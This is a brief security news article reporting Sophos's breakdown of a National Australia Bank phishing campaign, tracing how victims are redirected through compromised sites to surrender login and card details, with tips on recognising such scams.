Security experts from Sophos have published an article to detail the anatomy of a phishing scam. As an example, they provide a National Australia Bank (NAB) phishing email that has been seen in several inboxes over the past few days.
Recipients of the emails entitled “National Australia Bank – 1 NEW Message,” are urged to click on a link and log in to their account in order to read their “security messages.”
However, those who click on the link are not taken to the legitimate NAB website, but to a compromised Chinese government website that redirects them to a malicious webpage hosted on the hijacked site of a Colombian university.
Here, they’re asked to provide their NAB IDs and their passwords. Once submitted, the data is sent via a POST request to another compromised website, this time belonging to a US student vacation site.
Then, victims are asked to provide other personal and financial information – including name, date of birth, and payment card details – on a second phony NAB website.
The submitted information is sent to the same student vacation website, after which, the user is finally directed to the legitimate NAB domain.
Experts advise users to avoid legitimate-looking emails that contain links. For instance, NAB never includes links in genuine notifications, in order to help users tell them apart from fakes.
Furthermore, if the website you’re taken to is hosted on a domain other than nab.com.au, you’re likely dealing with a phishing scheme.
Finally, reputable companies always use HTTPS connections when they ask customers to submit sensitive information.
This particular NAB phishing scam is not new, but it has been sent to numerous users over the past days. NAB is aware of these types of scams and the financial institution has even published a scam advisory for customers.